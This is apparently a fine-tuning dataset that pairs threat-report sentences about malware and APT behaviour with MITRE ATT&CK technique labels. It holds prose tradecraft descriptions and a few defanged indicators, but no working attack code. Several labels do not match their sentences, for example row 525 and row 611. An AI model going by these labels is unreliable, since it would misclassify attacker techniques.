| 515 | The notes also contain a threat to leak private information that has been collected from the target if the ransom is not paid | ['T1484.001 - Domain Policy Modification: Group Policy Modification', 'T1078.002 - Domain Accounts'] | fine_tune |
| 516 | AT&T Alien Labs™ has discovered a new campaign by threat group TeamTNT that is targeting multiple operating systems and applications. The campaign uses multiple shell/batch scripts, new open source tools, a cryptocurrency miner, the TeamTNT IRC bot, and more | ['T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder', 'T1059.003 - Command and Scripting Interpreter: Windows Command Shell'] | fine_tune |
| 517 | To do this, Tick uses a number of publicly available hacktools such as Mimikatz, GSecdump, and Windows Credential Editor. The tools are downloaded and deployed to the original install directory previously created by the malware | ['T1588.002 - Tool'] | fine_tune |
| 518 | It seems that the implementation for dynamic import resolution slightly varies in comparison to the one used in Azazel rootkit | ['T1014 - Rootkit'] | fine_tune |
| 519 | Throughout our StellarParticle investigations, CrowdStrike identified what appeared to be a VBScript-based Active Directory enumeration toolkit. While the script’s contents have not been recovered to date, CrowdStrike has observed identical artifacts across multiple StellarParticle engagements that suggest the same or similar tool was used | ['T1057 - Process Discovery'] | fine_tune |
| 520 | If it is executed with the "help" parameter, it will install a service to execute itself as a service. This parameter is used by the trojanized installer. This has a notable side effect: if rmaserv.exe is executed isolated on a sandbox (so without the parameter), the service is not created. Consequently, the execution won't do anything and the dynamic analysis will be skewed. The second main feature is the service. This service has two features. First, it will launch the winprint32.exe executable (C2 contact module) and then it will wait for an event. This event is the mechanism used by the C2 contact module to alert the service executable to perform the cleaning of all components | ['T1569.002 - System Services: Service Execution'] | fine_tune |
| 521 | Network Reconnaissance – gathering information from machines on the network. Credential Theft – stealing user names and passwords, potentially to provide them with further access to the victim network. RAR archiving – files are transferred to staging servers before exfiltration. Csvde – can be used to extract Active Directory files and data. WMIExec – can be used for lateral movement and to execute commands remotely. PowerShell - a powerful interactive command-line interface and scripting environment included in the Windows operating system | ['T1074.002 - Remote Data Staging'] | fine_tune |
| 522 | On balance, the fall campaigns diverged from Bulgarian themed NetWire campaigns in the early summer in scope and scale. These campaigns distributed NetWire variants which used Bulgarian email lures, leveraged geofencing, and downloading EXEs through certutils. The NetWire malware has been around since at least 2002 and has been consistently in use by various actors across the threat landscape. This analysis shows groupings of similar campaigns distributing NetWire based on message attributes, email lures and language, Office document metadata, VBA Macro code, and malware configuration | ['T1566.001 - Phishing: Spearphishing Attachment', 'T1059.005 - Command and Scripting Interpreter: Visual Basic'] | fine_tune |
| 523 | This thread searches for for files with the following extensions on removable drives and copies them to ‘c:\system’ every 5 seconds | ['T1005 - Data from Local System', 'T1083 - File and Directory Discovery', 'T1074.001 - Data Staged: Local Data Staging', 'T1119 - Automated Collection', 'T1025 - Data from Removable Media'] | fine_tune |
| 524 | Observed Clop samples try to kill several processes and services related to backups and security solutions. Clop also leverages Code Signing to evade detection. We observed the use of two signers during our research, as shown below in Figure 1 | ['T1553.002 - Code Signing'] | fine_tune |
| 525 | The FTP account information used in the malware can expose the C&C server to attacks. The string ‘victory’ used in the password has also been found in the b374k webshell used by the Kimsuky group | ['T1598.003 - Spearphishing Link', 'T1059.005 - Command and Scripting Interpreter: Visual Basic', 'T1027 - Obfuscated Files or Information'] | fine_tune |
| 526 | The January 2022 version of PlugX malware utilizes RC4 encryption along with a hardcoded key that is built dynamically. For communications, the data is compressed then encrypted before sending to the command and control (C2) server and the same process in reverse is implemented for data received from the C2 server. e@T#L$PH%" as it is being passed along with the encrypted data. During the January 2022 campaigns, the delivered PlugX malware samples communicated with the C2 server 92.118.188[.]78 over port 187. In the February 2022 campaign, Proofpoint researchers observed a variation in which PlugX malware used an RC4 key that was sent to the bot in the first HTTP response which was then used to encrypt data going to the C2 server | ['T1071.001 - Application Layer Protocol: Web Protocols'] | fine_tune |
| 527 | Stage 2 is also .NET DLL file that downloads a third file from parinari[.]xyz, converts it from ASCII to binary, and then creates a scheduled task to load it | ['T1053.005 - Scheduled Task/Job: Scheduled Task'] | fine_tune |
| 528 | The plugin is designed to migrate the loader to the address space of another process. Injection parameters are set in the Lizar client configuration file. It should be noted that this plugin can be used not only to inject the loader, but also to execute other PE files in the address space of the specified process | ['T1055 - Process Injection', 'T1055.002 - Process Injection: Portable Executable Injection'] | fine_tune |
| 529 | This release adds features to spawn processes with an alternate parent process. This release also gives the operator control over the script templates Cobalt Strike uses in its attacks and workflows. This release of Cobalt Strike pushes back on this technique with the ppid command. For example, if I’m in a user context, I might set explorer.exe as my parent with something plausible (e.g, iexplore.exe) for my temporary processes. If I’m in a SYSTEM context, I might use services.exe as my parent process and ask Beacon to use svchost.exe for its temporary processes. Beacon’s runu command runs an arbitrary command as a child of another parent. These commands offer means to spawn a payload, in another desktop session, without remote process injection. The Resource Kit . Cobalt Strike 3.8’s Resource Kit finally gives you a way to change Cobalt Strike’s built-in script templates. The Resource Kit is a collection of Cobalt Strike’s default script templates and a sample Aggressor Script to bring these into Cobalt Strike. The Resource Kit benefits from new Aggressor Script hooks to provide the PowerShell, Python, and VBA script templates Cobalt Strike uses in its workflows | ['T1078.003 - Valid Accounts: Local Accounts'] | fine_tune |
| 530 | 2) Shell scripts used to launch the QEMU images. 3) Daemons used to start the shell scripts at boot and keep them running. 4) A CPU monitor shell script with an accompanying daemon that can start/stop the mining based on CPU usage and whether the Activity Monitor process is running | ['T1057 - Process Discovery'] | fine_tune |
| 531 | It does so by monitoring the content of the clipboard and if the data seem to be a cryptocurrency wallet, it replaces them with the attacker’s own. This technique is not new; it has been used by other malware in the past – even the infamous BackSwap banking trojan implemented it in its earliest stages | ['T1565.002 - Transmitted Data Manipulation'] | fine_tune |
| 532 | The data exchanged between the module and the C&C is encrypted with a proprietary algorithm and then encoded as readable latin characters | ['T1132.002 - Non-Standard Encoding'] | fine_tune |
| 533 | In earlier attacks, the group used malicious Microsoft Word documents to infect victims, with compromised websites being added to the mix as a more recent attack vector | ['T1566.001 - Phishing: Spearphishing Attachment'] | fine_tune |
| 534 | It eventually downloads a PowerShell module from an Amazon S3 bucket URL hxxps://s3[.]amazonaws[.]com/doclibrarysales/test[.]txt and then executes it | ['T1583.006 - Web Services', 'T1102 - Web Service'] | fine_tune |
| 535 | The script variant of the Helminth Trojan consists of a VBScript and PowerShell script named update.vbs and dns.ps1. We aptly named this variant the script version, as we found another version of this Trojan that we will discuss later in this Appendix | ['T1059.005 - Command and Scripting Interpreter: Visual Basic'] | fine_tune |
| 536 | C2 commands are represented as seemingly random alphanumerical ASCII strings (e.g. These dynamic updates to Goldmax configuration data enable ability to set a new activation date, replace the existing C2 URL and User-Agent values, enable/disable decoy network traffic feature, and update the number range used by its PRNG | ['T1059.003 - Command and Scripting Interpreter: Windows Command Shell'] | fine_tune |
| 537 | In order to meet the phishing emails’ infrastructure requirements, disposable domains and emails were used as the delivery medium. On occasions, the phishing emails contained links to external domains to download the first stage, and sometimes the first stage was attached to the email itself | ['T1566.002 - Phishing: Spearphishing Link'] | fine_tune |
| 538 | Once installed, JSSLoader provides the threat group with a backdoor to the victim’s computer and the organization | ['T1204.002 - User Execution: Malicious File', 'T1047 - Windows Management Instrumentation'] | fine_tune |
| 539 | To do so, this malware attempts to spread to other systems on network using what are likely stolen administrator credentials. This is again similar to the 2012 Shamoon attacks, where compromised but legitimate credentials obtained in advance of the attacks were also hard coded into the malware to aid in its propagation. Disttrack also has the ability to download and execute additional applications to the system, as well as remotely set the date to start wiping systems | ['T1569.002 - System Services: Service Execution'] | fine_tune |
| 540 | This data theft module appears to have been compiled in May 2015 and is designed to watch removable drives and collect files from them, depending on a set of rules defined by the attackers. The stolen data is copied into a hidden directory as “%MYPICTURES%\%volume serial number%“, from where it can be exfiltrated by the attackers using one of the AZZY implants | ['T1074.001 - Data Staged: Local Data Staging', 'T1025 - Data from Removable Media'] | fine_tune |
| 541 | The implant consists of a modified Cisco IOS image that allows the attacker to load different functional modules from the anonymity of the internet. Each of the modules are enabled via the HTTP protocol (not HTTPS), using a specifically crafted TCP packets sent to the routers interface. The packets have a nonstandard sequence and corresponding acknowledgment numbers. The modules can manifest themselves as independent executable code or hooks within the routers IOS that provide functionality similar to the backdoor password | ['T1205 - Traffic Signaling'] | fine_tune |
| 542 | Spearphishing Attachment (ATT&CK T1193) is one of the most used Initial Access techniques used by ransomware families as in Sodinokibi. Attackers use spam emails with an attached MS Office Word document including a malicious macro to download the ransomware to the target system. In order to show the lifecycle of Sodinokibi ransomware, we analyzed a Microsoft Word document. Sodinokibi is a “Ransomware-as-a-Service (RAAS) malware, so its distribution methods vary depending on the attacker distributing it | ['T1566.001 - Phishing: Spearphishing Attachment'] | fine_tune |
| 543 | Collects information about the infected system, network, drives, and installed applications. Saves the collected information to a file named “info” in “%appdata%\Micorosoft\Templates” and sends it to the C2 | ['T1082 - System Information Discovery'] | fine_tune |
| 544 | As can be seen from the Table 2 above, Kazuar has an extensive command set, many of which are similar in functionality as other backdoor Trojans. However, a few commands specific to Kazuar appear to be unique and are worth further discussion | ['T1029 - Scheduled Transfer'] | fine_tune |
| 545 | Adversaries aiming to exfiltrate large amounts of data will often use one or more systems or storage locations for intermittent storage of the collected data. This process is called staging and is one of the of the activities that NCC Group and Fox-IT has observed in the analysed C2 traffic | ['T1560.001 - Archive Collected Data: Archive via Utility', 'T1074.001 - Data Staged: Local Data Staging', 'T1074.002 - Remote Data Staging'] | fine_tune |
| 546 | The employee receiving this email downloaded and opened the document, which contained malicious code. Once the code was executed, a persistence mechanism was installed and a malicious password harvester was executed. In this instance, once the malicious code was executed, it dropped a malicious binary (DLL) similar to CobaltStrike, which subsequently created and executed additional files. The actor used the initially compromised system to escalate privileges and move laterally across additional systems on the network | ['T1566.001 - Phishing: Spearphishing Attachment'] | fine_tune |
| 547 | FANCY BEAR adversary used different tradecraft, deploying X-Agent malware with capabilities to do remote command execution, file transmission and keylogging. It was executed via rundll32 commands such as | ['T1059.003 - Command and Scripting Interpreter: Windows Command Shell', 'T1059 - Command and Scripting Interpreter', 'T1218.011 - Signed Binary Proxy Execution: Rundll32'] | fine_tune |
| 548 | Lucifer is quite powerful in its capabilities. Not only is it capable of dropping XMRig for cryptojacking Monero, it’s also capable of command and control (C2) operation and self-propagation through the exploitation of multiple vulnerabilities and credential brute-forcing. Additionally, it drops and runs EternalBlue, EternalRomance, and DoublePulsar backdoor against vulnerable targets for intranet infections | ['T1210 - Exploitation of Remote Services'] | fine_tune |
| 549 | We have rounded up 220 samples of the CARBANAK backdoor and compiled a table that highlights some interesting details that we were able to extract. It should be noted that in most of these cases the backdoor was embedded as a packed payload in another executable or in a weaponized document file of some kind. The MD5 hash is for the original executable file that eventually launches CARBANAK, but the details of each sample were extracted from memory during execution. This data provides us with a unique insight into the operational aspect of CARBANAK and can be downloaded here | ['T1055.002 - Process Injection: Portable Executable Injection'] | fine_tune |
| 550 | The execution chain ensures that persistence is set on the affected system using a .lnk file in the Startup directory. The .lnk file shown in Figure 17 opens the malicious VBS dropped on the system | ['T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder'] | fine_tune |
| 551 | In the final stage of its attacks, the TeleBots group always used the KillDisk malware to overwrite files with specific file extensions on the victims’ disks. The KillDisk malware used in the first wave of December 2016 attacks, instead of encrypting, simply overwrites targeted files | ['T1485 - Data Destruction'] | fine_tune |
| 552 | If that configuration is not available, it utilizes a hardcoded configuration in the binary. The tool uses a custom binary protocol over sockets for its command and control communication with the GUP Proxy Tool and all transferred data is encrypted using a modified version of RC4 encryption | ['T1095 - Non-Application Layer Protocol'] | fine_tune |
| 553 | The implant receives HTTP-based commands from a control server and parses the HTTP Content-Type and Content-Length from the HTTP header. If the HTTP Content-Type matches the following value, then the implant executes the command specified by the control server | ['T1071.001 - Application Layer Protocol: Web Protocols'] | fine_tune |
| 554 | The compressed_data field is compressed using the common ZLIB compression algorithm. Additionally, in the event data is being sent via HTTP rather than HTTPS, the following additional encryption algorithm is applied to the POST data | ['T1560.002 - Archive Collected Data: Archive via Library', 'T1573.001 - Symmetric Cryptography'] | fine_tune |
| 555 | The macro creates a copy of the files with their proper extensions using Extensible Storage Engine Utilities (esentutil.exe) with the following commands (esentutil.exe is also a legitimate program that is pre-installed in Windows | ['T1036 - Masquerading'] | fine_tune |
| 556 | At the second stage, the attackers remotely connected to the device and scanned the local network seeking to gain access to public shared folders, web servers, and any other open resources. The aim was to harvest information about the network, above all, servers and workstations used for making payments. If the firewall blocked access from one segment of the network to another, but allowed a reverse connection, the attackers used a different payload to build tunnels | ['T1135 - Network Share Discovery'] | fine_tune |
| 557 | Before being deleted, the DLL executes a string decoding routine that is designed to execute for about a minute, spiking central processing unit (CPU) usage for the regsvr32.exe process. Once the strings are decoded, the More_eggs components are decrypted, dropped to the system (normally in the %APPDATA%\Microsoft\ or %ProgramData%\Microsoft\ directories) and executed | ['T1140 - Deobfuscate/Decode Files or Information'] | fine_tune |
| 558 | The very narrow and specific set of email identifiers and organizations observed by CTU researchers strongly indicate that the campaign is focused on U.S. Based on the identified targets, CTU researchers assess with low confidence that a Russian government-sponsored threat group may be responsible for this campaign. Third-party researchers attribute this campaign to the Russia-based IRON RITUAL threat group (also known as NOBELIUM and APT29). IRON RITUAL has been linked to the SUNBURST malware used in the SolarWinds supply chain attack | ['T1566.002 - Phishing: Spearphishing Link'] | fine_tune |
| 559 | Then the article describes how, since the beginning of 2019, the group has been leveraging self-extracting archives to run code | ['T1053.005 - Scheduled Task/Job: Scheduled Task', 'T1218.010 - Signed Binary Proxy Execution: Regsvr32', 'T1027 - Obfuscated Files or Information'] | fine_tune |
| 560 | Finally, the loader spawns cmd.exe to perform a series of reconnaissance commands to obtain information about the network and domain | ['T1482 - Domain Trust Discovery', 'T1059.003 - Command and Scripting Interpreter: Windows Command Shell'] | fine_tune |
| 561 | The checks are done in an obfuscated way within the jumble of the code that the malware has (in the virtual machine used here the Spanish language of Spain (es-ES) was used; it is the code 0xC0A that appears in the stack in the screenshot | ['T1082 - System Information Discovery'] | fine_tune |
| 562 | Gather the names of all services running on the system. Gather a list of the names of all processes running on the endpoint. Get Microsoft Version Number from the registry, specifically from reg key/value: HKEY_CLASSES_ROOT\Excel.Application\CurVer||Default. The instrumentor script also enables all macros for Office by setting the VBAWarnings registry value to 0x1 at: HKCU\Software\Microsoft\Office\<OfficeVersionNumber>.0\Word\Security\VBAWarnings = 0x1 | ['T1012 - Query Registry'] | fine_tune |
| 563 | It also creates a folder in C:\SDRSMLINK\ and shares this folder with the rest of the network | ['T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder', 'T1564.006 - Run Virtual Instance'] | fine_tune |
| 564 | In october 2016 Group-IB published the report about the Cobalt group. Now, a year later, this group is continuing to attack banks, which is reported monthly by Group-IB's Threat Intelligence team. Network penetration In all cases investigated by Group-IB, the Cobalt group used a set of spear phishing emails to gain initial access to the corporate infrastructure. However, some of the email addresses belong to employees that no longer work at the organization, which means that the Cobalt group likely uses out-of-date mailing lists. Provision of the malware survivability The Cobalt group uses different methods to ensure malware survivability on corporate networks. From our experience, the Cobalt group uses a new method to provide its survivability in every attack. The former module is installed on a system that has access to the Internet and provides interaction with the C&C server using HTTP/HTTPS/DNS protocols. Another module is installed even in systems that do not have Internet access, as, using SMB protocol (which is typically used within a local network), the SMB module is controlled via infected computers running the HTTP/HTTPS/DNS module. For interaction on HTTPS protocol, HTTP protocol profiles may be used with an indicated SSL certificate, but for data exchange on the DNS protocol, it requires DNS A, AAAA, and TXT records. Conclusion After infecting one computer on an organization's network, the Cobalt group analyzes the programs used on it and search for critical servers and the computers from which they are accessed | ['T1021.001 - Remote Services: Remote Desktop Protocol'] | fine_tune |
| 565 | We recently observed an instance where the FlawedAmmyy downloader was not digitally signed (FlawedAmmyy RAT payload is still signed, however). It could be a blip — perhaps a one-off — but it's still notable | ['T1553.002 - Code Signing'] | fine_tune |
| 566 | Its sole purpose is to load setup.dll using LoadLibraryA. If not, it will attempt to obtain such privileges using token impersonation if the version of Windows is below Windows 7 build 7601; otherwise it will attempt different UAC bypass techniques, allowing installation of the payload loader into one of | ['T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control'] | fine_tune |
| 567 | Most of the infected sites use the TYPO3 CMS (see: https://typo3.org/), which could indicate the attackers are abusing a specific vulnerability in this publishing platform | ['T1071.001 - Application Layer Protocol: Web Protocols'] | fine_tune |
| 568 | In the past, Emissary Panda has used many ways to target their victims, with the most notable being the exploits from the Hacking Team leak. Usually, the delivered payload is either the well-known ‘PlugX’ or ‘HttpBrowser’ RAT, a tool which is believed to have Chinese origins and to be used only by certain Chinese hacking groups | ['T1027 - Obfuscated Files or Information'] | fine_tune |
| 569 | Both RATs provide a wide range of functionality on the target machine, ranging from collecting files, watching the screen, to capturing passwords and keystrokes. The RATs also enable the operator to remotely delete files, and spy on the computer user via the microphone or webcam | ['T1070.004 - Indicator Removal on Host: File Deletion'] | fine_tune |
| 570 | A copy of the initial EXE for GuLoader is made persistent, then the original is deleted from the infected user’s AppData\Local\Temp directory where it was originally saved. The GuLoader EXE is persistent through the Windows Registry under the following key | ['T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder'] | fine_tune |
| 571 | And, of course, the attackers added the ability to control the infected machine. The code receives a binary blob official M.E.Doc server, decrypts it using the Triple DES algorithm, and, afterwards, decompresses it using GZip. The result is an XML file that could contain several commands at once. This remote control feature makes the backdoor a fully-featured cyberespionage and cybersabotage platform at the same time | ['T1070.004 - Indicator Removal on Host: File Deletion'] | fine_tune |
| 572 | mailsearcher32 module This module searches the infected system’s files to gather email addresses for information-stealing purposes. Emotet, according to previous research by Brad Duncan, is also responsible for delivering this password-grabbing Trickbot variant, as well as Azorult, to users | ['T1083 - File and Directory Discovery', 'T1087.003 - Email Account'] | fine_tune |
| 573 | Otherwise, it will add the binary’s path to the Software\Microsoft\Windows\CurrentVersion\Run key with —Update as a parameter | ['T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder'] | fine_tune |
| 574 | Once an attacker has admin access to a Domain Controller, the KRBTGT account password hashes can be extracted using Mimikatz | ['T1550.003 - Use Alternate Authentication Material: Pass the Ticket'] | fine_tune |
| 575 | The persistence mechanisms also change, offering the options to use XDG Autostart Entries and crontabs for persistence. We’ve waxed lyrical about crontabs before, but we haven’t explored XDG Autostart Entries in detail | ['T1547.013 - XDG Autostart Entries'] | fine_tune |
| 576 | browser history from Firefox, Google Chrome, Microsoft Edge and Internet Explorer; - usernames and passwords stored in the listed browsers; - email accounts from Microsoft Outlook and Mozilla Thunderbird | ['T1555.003 - Credentials from Password Stores: Credentials from Web Browsers', 'T1087.003 - Email Account'] | fine_tune |
| 577 | After using RTF files, the group started using self-extracting (SFX) archives that use common document icons in an attempt to further mislead their victims. It was briefly documented by Threatbook (in Chinese). When run, these self-extracting RAR files drop and execute DLL files (with a .ocx extension) with the final payload being the previously documented {A96B020F-0000-466F-A96D-A91BBF8EAC96}.dll. This section will describe the technique and what they have altered to achieve their goal | ['T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder'] | fine_tune |
| 578 | H1N1 has added a plethora of new functionality in comparison to earlier reports. Throughout this blog series we will be analyzing the capabilities of H1N1 including: obfuscation, a User Account Control (UAC) bypass, information stealing, data exfiltration, loader/dropper, and self-propagation/lateral movement techniques used by this variant.1,2 | ['T1027 - Obfuscated Files or Information'] | fine_tune |
| 579 | Attempted to blend in with a file name that matched the system name it resided on - Configured for persistence via a crontab entry with a @reboot line - Used likely compromised infrastructure for C2 | ['T1036.005 - Masquerading: Match Legitimate Name or Location', 'T1036 - Masquerading'] | fine_tune |
| 580 | RAR archiving – files are transferred to staging servers before exfiltration. They may be encrypted or compressed, to make them easier to extract. Certutil – a command-line utility that can be exploited and used for various malicious purposes, such as to decode information, to download files, and to install browser root certificates. Adfind – a command-line tool that can be used to perform Active Directory queries. Csvde – can be used to extract Active Directory files and data. Ntdsutil – can be used as a credential-dumping tool. WMIExec – can be used for lateral movement and to execute commands remotely. It can be used to find information and execute code, and is frequently abused by malicious actors | ['T1560.001 - Archive Collected Data: Archive via Utility'] | fine_tune |
| 581 | In order to collect even more information, from time to time the Zebrocy operators upload and use dumpers on victims’ machines. The current dumpers have some similarities with those previously used by the group. In this case, Yandex Browser, Chromium, 7Star Browser (a Chromium-based browser), and CentBrowser are targeted, as well as versions of Microsoft Outlook from 1997 through 2016 | ['T1555.003 - Credentials from Password Stores: Credentials from Web Browsers'] | fine_tune |
| 582 | It also moves the JS file to ‘Shell.NameSpace(28)’ (‘ssfLOCALAPPDATA’ – ‘\AppData\Local’) and creates a scheduled task to use WScript to execute the file at every user log on. The installation routine then copies the keylogger to the registry, sets the uid + 0 flag to 1 to indicate that installation was completed, and executes the scheduled task it created | ['T1053.005 - Scheduled Task/Job: Scheduled Task'] | fine_tune |
| 583 | BADFLICK: a backdoor that is capable of modifying the file system, generating a reverse shell, and modifying its command and control (C2) configuration. China Chopper: a simple code injection webshell that executes Microsoft .NET code within HTTP POST commands. This allows the shell to upload and download files, execute applications with web server account permissions, list directory contents, access Active Directory, access databases, and any other action allowed by the .NET runtime | ['T1059.004 - Command and Scripting Interpreter: Bash'] | fine_tune |
| 584 | Then, the malware loads an executable file from WM_DSP resource and runs a shellcode that contains approximately1500 bytes (after decrypting it with XOR 0x45 | ['T1140 - Deobfuscate/Decode Files or Information'] | fine_tune |
| 585 | Kimsuky uses memory dump programs instead of using well-known malicious software and performs the credential extraction offline. It can be used as a general process dump utility that actors can embed in other scripts, as seen by Kimsuky’s inclusion of ProcDump in the BabyShark malware. The victim is then redirected to the official Chrome Web Store page to install a Chrome extension, which has the ability to steal cookies and site passwords and loads a JavaScript file, named jQuery.js, from a separate site (see figure 3).[51(link is external | ['T1204.002 - User Execution: Malicious File', 'T1555.003 - Credentials from Password Stores: Credentials from Web Browsers'] | fine_tune |
| 586 | The impact of finding this implant on your network is severe and most likely indicates the presence of other footholds or compromised systems. This backdoor provides ample capability for the attacker to propagate and compromise other hosts and critical data using this as a very stealthy beachhead | ['T1556.004 - Network Device Authentication'] | fine_tune |
| 587 | InvisiMole is capable of scanning enabled wireless networks on the compromised system. It records information such as the SSID and MAC address of the visible Wi-Fi access points | ['T1016 - System Network Configuration Discovery'] | fine_tune |
| 588 | Besides the stolen data, it sends the Windows product name and version, username, computer name, and domain name to the C&C server | ['T1082 - System Information Discovery'] | fine_tune |
| 589 | The implant has the capability of gathering data from the victim’s system. The following information will be gathered and sent to the command and control server | ['T1560.002 - Archive Collected Data: Archive via Library'] | fine_tune |
| 590 | The threat actors also collected the files “ntds.dit” and the “SYSTEM” registry hive. DHS observed the threat actors compress all of these files into archives named “SYSTEM.zip” and “comps.zip | ['T1560 - Archive Collected Data'] | fine_tune |
| 591 | Malicious Word .doc file Besides the .pps file, the threat actor uses rich text files to deliver the malware. While other researchers have reported that these files exploit CVE-2012-0158, Symantec has also observed CVE-2015-1641 being exploited to drop Backdoor.Steladok | ['T1189 - Drive-by Compromise', 'T1203 - Exploitation for Client Execution'] | fine_tune |
| 592 | Quickly after the initial compromise, the operator deploys a tool named "dog.exe. This malware is written in .NET and its purpose is to monitor hard drive paths and to exfiltrate the information via an email account or an FTP, depending on the configuration. The configuration file is named dconf.json | ['T1048 - Exfiltration Over Alternative Protocol'] | fine_tune |
| 593 | Stealth Falcon demonstrates some familiarity with the patterns of behavior, interests, and activities of its targets, suggesting that the operators may have been working with other sources of information about their targets’ behaviors. In addition, Stealth Falcon displayed above-average operational security throughout the campaign. Stealth Falcon also shows familiarity with creating and maintaining a range of fictitious personas, and registering and managing a significant amount of attack and C2 infrastructure with concern for operational security | ['T1041 - Exfiltration Over C2 Channel'] | fine_tune |
| 594 | The malware families used in this campaign consisted mainly of malicious documents featuring CARROTBAT downloaders with SYSCON payloads, but also included a new malware downloader Unit 42 has dubbed CARROTBALL | ['T1204.002 - User Execution: Malicious File'] | fine_tune |
| 595 | Upon execution, the payload injects into iexplore.exe process and starts encrypting text files and documents of the victim machine | ['T1055 - Process Injection'] | fine_tune |
| 596 | GOLD CABIN uses malicious documents, often contained in password-protected archives, delivered through email to download and execute payloads. The second-stage payloads are most frequently Gozi ISFB (Ursnif) or IcedID (Bokbot), sometimes using intermediary malware like Valak. GOLD CABIN infrastructure relies on artificial appearing and frequently changing URLs created with a domain generation algorithm (DGA). The URLs host a PHP object that returns the malware as a DLL file.ToolsTaegis™ XDR Adversary Software Coverage Tool | ['T1568.002 - Domain Generation Algorithms'] | fine_tune |
| 597 | Using valid credentials, CARBON SPIDER moves laterally through victim environments using RDP and occasionally SSH. Occasionally, CARBON SPIDER has deployed the legitimate GoToAssist or TightVNC tools to provide redundant control of hosts | ['T1078 - Valid Accounts'] | fine_tune |
| 598 | The Gamaredon group uses a package that includes a custom Microsoft Outlook Visual Basic for Applications (VBA) project. Using Outlook macros to deliver malware is something we rarely see while investigating malicious campaigns | ['T1106 - Native API', 'T1218.011 - Signed Binary Proxy Execution: Rundll32', 'T1120 - Peripheral Device Discovery', 'T1059.005 - Command and Scripting Interpreter: Visual Basic'] | fine_tune |
| 599 | Numerous other similarities are present in addition to system reconnaissance methods; the communication mechanism uses the same user agent string as Gold Dragon | ['T1071.001 - Application Layer Protocol: Web Protocols'] | fine_tune |
| 600 | Proofpoint researchers frequently observe Silent Librarian’s phishing attempts originating from a university unrelated to their current target using a separate, unrelated university’s URL shortening service. This short URL links to a phishing landing page either directly or via one or more third-party sites that eventually lands the user on a clone of a login portal hosted on an actor-controlled server | ['T1588.002 - Tool', 'T1598.003 - Spearphishing Link', 'T1608.005 - Link Target'] | fine_tune |
| 601 | The functional payload is a DLL compiled on 2019-03-11 02:23:54, which has two functionalities depending if the binary has a command line argument -daemon or -worker passed to it. The daemon functionality handles the C2 communications portion of the Trojan, which is configured to communicate with 185.12.45[.]134 over HTTPS using the following URL | ['T1071.001 - Application Layer Protocol: Web Protocols'] | fine_tune |
| 602 | An official website of the United States government . Here’s how you know . Official websites use .gov A .gov website belongs to an official government organization in the United States. Secure .gov websites use HTTPS A lock (LockA locked padlock) or https:// means you’ve safely connected to the .gov website. O’Reilly of the Defense Criminal Investigative Service (DCIS) of the U.S. Among other things, Zhu and Zhang registered IT infrastructure that the APT10 Group used for its intrusions and engaged in illegal hacking operations. The indictment alleges that the defendants were part of a group that hacked computers in at least a dozen countries and gave China’s intelligence service access to sensitive business information,” said Deputy Attorney General Rosenstein. It's going to take all of us working together to protect our economic security and our way of life, because the American people deserve no less. The APT10 Group used some of the same online facilities to initiate, facilitate and execute its campaigns during the conspiracy. Earlier, beginning in or about 2006, members of the APT10 Group, including Zhu and Zhang, engaged in an intrusion campaign to obtain unauthorized access to the computers and computer networks of more than 45 technology companies and U.S. To avoid antivirus detection, the malware was installed using malicious files that masqueraded as legitimate files associated with the victim computer’s operating system. Such malware enabled members of the APT10 Group to monitor victims’ computers remotely and steal user credentials | ['T1199 - Trusted Relationship'] | fine_tune |
| 603 | The Iranian attacker group (APT35) and the Chinese attacker group (APT31) targeted campaign staffers’ personal emails with credential phishing emails and emails containing tracking links. As part of our wider tracking of APT31 activity, we've also seen them deploy targeted malware campaigns | ['T1598 - Phishing for Information'] | fine_tune |
| 604 | PLEAD and KIVARS, for instance, share the use of RTLO techniques to disguise their installers as documents. Both also use decoy documents to make the RTLO attack more convincing. Another similarity is the use of a small loader component to load encrypted backdoors into memory | ['T1204.002 - User Execution: Malicious File'] | fine_tune |
| 605 | Nyetya requires user credentials to spread itself laterally via the PsExec and WMI vectors (which are detailed in the "Malware Functionality" section). Talos has identified three ways Nyetya can obtain these credentials. First, credentials can be manually passed in via a command line argument | ['T1078.003 - Valid Accounts: Local Accounts'] | fine_tune |
| 606 | Often service accounts are members of Domain Admins (or equivalent) or a Domain Admin was recently logged on to the computer an attacker dump credentials from. Using these credentials, an attacker can gain access to a Domain Controller and get all domain credentials, including the KRBTGT account NTLM hash which is used to create Kerberos Golden Tickets | ['T1550.003 - Use Alternate Authentication Material: Pass the Ticket'] | fine_tune |
| 607 | Analysis of the threat actor’s indicators of compromise (IOCs) and tactics, techniques, and procedures (TTPs) indicates a correlation with the group known by the names, Pioneer Kitten and UNC757. This threat actor has been observed exploiting several publicly known Common Vulnerabilities and Exposures (CVEs) dealing with Pulse Secure virtual private network (VPN), Citrix NetScaler, and F5 vulnerabilities. This threat actor used these vulnerabilities to gain initial access to targeted networks and then maintained access within the successfully exploited networks for several months using multiple means of persistence | ['T1190 - Exploit Public-Facing Application'] | fine_tune |
| 608 | The touch utility sets the modification and access times of files. If any file does not exist, it is created with default permissions. This makes the utility useful to malware in two common scenarios: for creating an empty file at a given path that is later passed data, and/or for changing the timestamp on a file as a means of evasion, also known as “timestomping | ['T1222.002 - File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification'] | fine_tune |
| 609 | For the rest, we acknowledge that the subdomains used could be indicative of the target; they could also be used to go after third parties that might trust those organizations | ['T1583.001 - Domains'] | fine_tune |
| 610 | Both backdoors target Arabic-speaking users. They use code that checks if the compromised machine has the Arabic language installed | ['T1614.001 - System Location Discovery: System Language Discovery', 'T1614.001 - System Location Discovery: System Language Discovery'] | fine_tune |
| 611 | Digital delivery of over 3,000 APT1 indicators, such as domain names, and MD5 hashes of malware. Thirteen (13) X.509 encryption certificates used by APT1. A set of APT1 Indicators of Compromise (IOCs) and detailed descriptions of over 40 malware families in APT1's arsenal of digital weapons. IOCs that can be used in conjunction with Redline™, Mandiant's free host-based investigative tool, or with Mandiant Intelligent Response® (MIR), Mandiant's commercial enterprise investigative tool | ['T1036.005 - Masquerading: Match Legitimate Name or Location'] | fine_tune |
